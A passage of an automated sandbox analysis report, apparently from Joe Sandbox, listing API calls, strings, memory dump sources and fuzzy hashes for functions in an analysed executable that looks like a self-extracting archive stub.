                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0011B63C
                                                                                                • Part of subcall function 00118518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0011C13D,00000000,?,001167E2,?,00000008,?,001189AD,?,?,?), ref: 0011854A
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0011B662
                                                                                              • _free.LIBCMT ref: 0011B675
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0011B684
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: 6738d82fd6ecf5531a99f082a1211418fc6c0dd82ce693e283c1ffd8f1310d45
                                                                                              • Instruction ID: f8808c7e2dcdc659fe75e83267d71c7f96671cc1a97adaf69bb4e26bd347aca9
                                                                                              • Opcode Fuzzy Hash: 6738d82fd6ecf5531a99f082a1211418fc6c0dd82ce693e283c1ffd8f1310d45
                                                                                              • Instruction Fuzzy Hash: C80184B2605615BF63391A766CCCCFF6A6DDFE6BA03150239B914C3510EF648D92D1B0
                                                                                              Function 00119029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,0011895F,001185FB,?,00118FD3,00000001,00000364,?,00113713,00000050,?,00130EE8,00000200), ref: 0011902E
                                                                                              • _free.LIBCMT ref: 00119063
                                                                                              • _free.LIBCMT ref: 0011908A
                                                                                              • SetLastError.KERNEL32(00000000,?,00130EE8,00000200), ref: 00119097
                                                                                              • SetLastError.KERNEL32(00000000,?,00130EE8,00000200), ref: 001190A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: e318bcd19ffc0919b06cd4be49cfb7d384eccb2a8e7b73fac7f91e7f49a50aa8
                                                                                              • Instruction ID: abad5e062298009d4d3d02bd049f334cdcbee7355e9c7dc3c3d8f5efcbc47f55
                                                                                              • Opcode Fuzzy Hash: e318bcd19ffc0919b06cd4be49cfb7d384eccb2a8e7b73fac7f91e7f49a50aa8
                                                                                              • Instruction Fuzzy Hash: 6B017832205B007BC33E27356C95EEB2A6E9FE43B17310138F43993652EF248CD24064
                                                                                              Function 0010075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00100A41: ResetEvent.KERNEL32(?), ref: 00100A53
                                                                                                • Part of subcall function 00100A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00100A67
                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0010078F
                                                                                              • CloseHandle.KERNEL32(?,?), ref: 001007A9
                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 001007C2
                                                                                              • CloseHandle.KERNEL32(?), ref: 001007CE
                                                                                              • CloseHandle.KERNEL32(?), ref: 001007DA
                                                                                                • Part of subcall function 0010084E: WaitForSingleObject.KERNEL32(?,000000FF,00100A78,?), ref: 00100854
                                                                                                • Part of subcall function 0010084E: GetLastError.KERNEL32(?), ref: 00100860
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1868215902-0
                                                                                              • Opcode ID: b6f77d40dbaf29df2aeb9daf4047213514e627fdd5f45726fe8e9203020edd5f
                                                                                              • Instruction ID: d6bc90f48c5c2d605d9619a6cbcb8120f90dd0ae0c5954f4f258544b45e0734b
                                                                                              • Opcode Fuzzy Hash: b6f77d40dbaf29df2aeb9daf4047213514e627fdd5f45726fe8e9203020edd5f
                                                                                              • Instruction Fuzzy Hash: AB01B572540704FFC7329B65DD84FC6BBE9FB49710F000519F1AA425A0CBB96A95CBA4
                                                                                              Function 0011BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0011BF28
                                                                                                • Part of subcall function 001184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?), ref: 001184F4
                                                                                                • Part of subcall function 001184DE: GetLastError.KERNEL32(?,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?,?), ref: 00118506
                                                                                              • _free.LIBCMT ref: 0011BF3A
                                                                                              • _free.LIBCMT ref: 0011BF4C
                                                                                              • _free.LIBCMT ref: 0011BF5E
                                                                                              • _free.LIBCMT ref: 0011BF70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 3e3a37277489906a74b38beaf690b767cc6d45c9bbfd084fe2582409e125be77
                                                                                              • Instruction ID: fd929430a07e367bd548d9feb1365d7fc6c6c1cba192aaa5c8b8a26a4fac51a2
                                                                                              • Opcode Fuzzy Hash: 3e3a37277489906a74b38beaf690b767cc6d45c9bbfd084fe2582409e125be77
                                                                                              • Instruction Fuzzy Hash: 50F0FF32508606B78638EFA4FEC6D9A73D9BB147107648925F008D7D10CF34FCC28A54
                                                                                              Function 00118060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0011807E
                                                                                                • Part of subcall function 001184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?), ref: 001184F4
                                                                                                • Part of subcall function 001184DE: GetLastError.KERNEL32(?,?,0011BFA7,?,00000000,?,00000000,?,0011BFCE,?,00000007,?,?,0011C3CB,?,?), ref: 00118506
                                                                                              • _free.LIBCMT ref: 00118090
                                                                                              • _free.LIBCMT ref: 001180A3
                                                                                              • _free.LIBCMT ref: 001180B4
                                                                                              • _free.LIBCMT ref: 001180C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 40987b970eb3d99019011eea51ac49ada8b868a57c2c3f5f1eee8c9d25eee4fe
                                                                                              • Instruction ID: 17845dd6cce7df35839688ad8d285088df0401fde2bf983acd50727e3a735708
                                                                                              • Opcode Fuzzy Hash: 40987b970eb3d99019011eea51ac49ada8b868a57c2c3f5f1eee8c9d25eee4fe
                                                                                              • Instruction Fuzzy Hash: 49F03A74801329FB87266F15BC016893BA5F7247227588A2AF8049FE70CF3108E29FC1
                                                                                              Function 001176BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\6uPVRnocVS.exe,00000104), ref: 001176FD
                                                                                              • _free.LIBCMT ref: 001177C8
                                                                                              • _free.LIBCMT ref: 001177D2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Users\user\Desktop\6uPVRnocVS.exe
                                                                                              • API String ID: 2506810119-2924311466
                                                                                              • Opcode ID: e080308b14da3d9d04ff8042f1953bb9307ce2a936aaa9e173733f5a4a458b7a
                                                                                              • Instruction ID: c711f9c2ffb7ec2a9f031ad96501b4aa548ceed6175de7b5107935e04a8a8e9a
                                                                                              • Opcode Fuzzy Hash: e080308b14da3d9d04ff8042f1953bb9307ce2a936aaa9e173733f5a4a458b7a
                                                                                              • Instruction Fuzzy Hash: 8B314C71A08218EFDB29DB999885ADEBBF8EB95710F144076E8049B791DB704AC08B90
                                                                                              Function 000F7574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F7579
                                                                                                • Part of subcall function 000F3B3D: __EH_prolog.LIBCMT ref: 000F3B42
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 000F7640
                                                                                                • Part of subcall function 000F7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 000F7C04
                                                                                                • Part of subcall function 000F7BF5: GetLastError.KERNEL32 ref: 000F7C4A
                                                                                                • Part of subcall function 000F7BF5: CloseHandle.KERNEL32(?), ref: 000F7C59
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                              • API String ID: 3813983858-639343689
                                                                                              • Opcode ID: cfd1c101a9ff49d189166e0be08d3cc2c618e8b78d1de27da119c88a95657966
                                                                                              • Instruction ID: 97c1dcc757eb42a68b9ff09334807456abf3911864c4389946fedcbbd194fcf1
                                                                                              • Opcode Fuzzy Hash: cfd1c101a9ff49d189166e0be08d3cc2c618e8b78d1de27da119c88a95657966
                                                                                              • Instruction Fuzzy Hash: 6D31287190820CAEDF61EB68DC01BFE7BF8AF19304F004069F548E7982DBB44A44DB61
                                                                                              Function 0010A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 000F130B: GetDlgItem.USER32(00000000,00003021), ref: 000F134F
                                                                                                • Part of subcall function 000F130B: SetWindowTextW.USER32(00000000,001235B4), ref: 000F1365
                                                                                              • EndDialog.USER32(?,00000001), ref: 0010A4B8
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0010A4CD
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0010A4E2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: ASKNEXTVOL
                                                                                              • API String ID: 445417207-3402441367
                                                                                              • Opcode ID: c8b6640b421936320acff4fd3ed595ac091a7781bbf79f9444c8f4e16dcc1fce
                                                                                              • Instruction ID: 870bbe7bca9675876392bac2c336e9ef4ce4a0e47d60df01ddfef2f5961682f6
                                                                                              • Opcode Fuzzy Hash: c8b6640b421936320acff4fd3ed595ac091a7781bbf79f9444c8f4e16dcc1fce
                                                                                              • Instruction Fuzzy Hash: 1711D336244300EFD6219FA8DC49F6A37A9EF4B301F980040F381DB4E1C7E19941E762
                                                                                              Function 000FD1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fprintf_l_strncpy
                                                                                              • String ID: $%s$@%s
                                                                                              • API String ID: 1857242416-834177443
                                                                                              • Opcode ID: d8d677cd6cde45766c8d9897a3b3b3af71dfe5cce2546430ec1e4045db070e20
                                                                                              • Instruction ID: 238204aeba30fb1c5677f702ceaef1cffef63527b741cab4bdf5903f22ad68fe
                                                                                              • Opcode Fuzzy Hash: d8d677cd6cde45766c8d9897a3b3b3af71dfe5cce2546430ec1e4045db070e20
                                                                                              • Instruction Fuzzy Hash: C321813244020CAAEF60DFA4DC06FFE7BEAAF15300F040522FB15965A2D375DA55EB91
                                                                                              Function 0010A990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 000F130B: GetDlgItem.USER32(00000000,00003021), ref: 000F134F
                                                                                                • Part of subcall function 000F130B: SetWindowTextW.USER32(00000000,001235B4), ref: 000F1365
                                                                                              • EndDialog.USER32(?,00000001), ref: 0010A9DE
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0010A9F6
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0010AA24
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 445417207-3292211884
                                                                                              • Opcode ID: c9c087bab7fce743a19bd060ea1a9ff7080f482c042acc5c6d241884f188b6e7
                                                                                              • Instruction ID: 5d20b4a05e5de21c05cf5263a113b4168cc213c28b97aad2ff7fc4a1d14c95d9
                                                                                              • Opcode Fuzzy Hash: c9c087bab7fce743a19bd060ea1a9ff7080f482c042acc5c6d241884f188b6e7
                                                                                              • Instruction Fuzzy Hash: 4D11E933A40328BADB219A649D45FFA376CEF4A705F410011FB85B74D1C3B19951D7A2
                                                                                              Function 000FB4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 000FB51E
                                                                                                • Part of subcall function 000F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000F401D
                                                                                              • _wcschr.LIBVCRUNTIME ref: 000FB53C
                                                                                              • _wcschr.LIBVCRUNTIME ref: 000FB54C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                              • String ID: %c:\
                                                                                              • API String ID: 525462905-3142399695
                                                                                              • Opcode ID: 24b6457325f30e86745b044bd5b5a189846dba227256957a89e17161453fcf2d
                                                                                              • Instruction ID: f88fd4bae11ad612686ed10190cb426e8a3ed118737f2db5b584f57539c65333
                                                                                              • Opcode Fuzzy Hash: 24b6457325f30e86745b044bd5b5a189846dba227256957a89e17161453fcf2d
                                                                                              • Instruction Fuzzy Hash: F7014953900729BAC7306B75DC42E7BB7ECDFA6BA07504416FA44C6882FF38D840DAA1
                                                                                              Function 001006BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,000FABC5,00000008,?,00000000,?,000FCB88,?,00000000), ref: 001006F3
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,000FABC5,00000008,?,00000000,?,000FCB88,?,00000000), ref: 001006FD
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,000FABC5,00000008,?,00000000,?,000FCB88,?,00000000), ref: 0010070D
                                                                                              Strings
                                                                                              • Thread pool initialization failed., xrefs: 00100725
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                              • String ID: Thread pool initialization failed.
                                                                                              • API String ID: 3340455307-2182114853
                                                                                              • Opcode ID: 622a1d82b3513f0719d736941b661990719e682c156cd6a3010e2972f06e59f4
                                                                                              • Instruction ID: 6923aab76d9295984233be4cb212c42889639b421d92bd9bba91dbb69d19d983
                                                                                              • Opcode Fuzzy Hash: 622a1d82b3513f0719d736941b661990719e682c156cd6a3010e2972f06e59f4
                                                                                              • Instruction Fuzzy Hash: DB1173B1500708AFC3315F65D884AA7FBECEB59754F10482EF1DA82240D7B66991CB64
                                                                                              Function 0010D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                              • API String ID: 0-56093855
                                                                                              • Opcode ID: 6ea484874509e78124a4745711ceed7e366dbecf61fb9fbf6943cf1c9409ce9c
                                                                                              • Instruction ID: b360be46052f411ad8eddd07a84231f8693abd0695fafb6cffba0692c1b1e230
                                                                                              • Opcode Fuzzy Hash: 6ea484874509e78124a4745711ceed7e366dbecf61fb9fbf6943cf1c9409ce9c
                                                                                              • Instruction Fuzzy Hash: 3B01B176600349AFCB118FA8FD44B5A3BA9F709391B004421F585D6EB0C7B19890EBA1
                                                                                              Function 001191DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
